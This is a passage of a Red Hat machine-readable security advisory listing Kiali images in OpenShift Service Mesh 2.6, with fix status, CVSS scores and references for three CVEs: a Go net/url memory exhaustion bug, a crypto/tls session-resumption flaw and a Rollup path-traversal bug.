"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64 as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x as a component of Red Hat OpenShift Service Mesh 2.6",
"product_id": "Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
},
"product_reference": "registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Service Mesh 2.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "During session resumption in crypto/tls, if the underlying Config has its ClientCAs or RootCAs fields mutated between the initial handshake and the resumed handshake, the resumed handshake may succeed when it should have failed. This may happen when a user calls Config.Clone and mutates the returned Config, or uses Config.GetConfigForClient. This can cause a client to resume a session with a server that it would not have resumed with during the initial handshake, or cause a server to resume a session with a client that it would not have resumed with during the initial handshake.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: Unexpected session resumption in crypto/tls",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
"details": "See Kiali 1.73.28 documentation at https://docs.redhat.com/en/documentation/openshift_container_platform/4.18/html/service_mesh/service-mesh-2-x",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5132"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: Unexpected session resumption in crypto/tls"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:5a8a46e92a178be088251e0dcb67612d16bafeee910af6bd55de82a4727daa02_amd64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6487d8be05cb57a356dd53769f93c84d0abb3729ce1b39041c4d02247ad8e771_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:6c91551425148cad302317d8aac839b04e95dc7ecdf02cb8bddf4aaa87dcd550_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-rhel8@sha256:a51a1b8587c6d4d63ba802112dd8b4a79d87a8af8dbf5341a3e5e917cae437dd_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:5bccd71519ece8217238731eec2d8aea226b53403e111113e94086d0695a1619_s390x",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:708f623ecd4790488b9377dac0417ce9c99e52a350a5d387722608beb54d5a63_arm64",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:af899fd57742510613433c8d9dab94989f4c5c9f7f3631985e4e8296a5781ea2_ppc64le",
"Red Hat OpenShift Service Mesh 2.6:registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8@sha256:c37bc564685eacc236f7e9a3df6a9b3f0c1ee4bcaa0ee52ec42df6a27e4e4339_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T14:09:55+00:00",
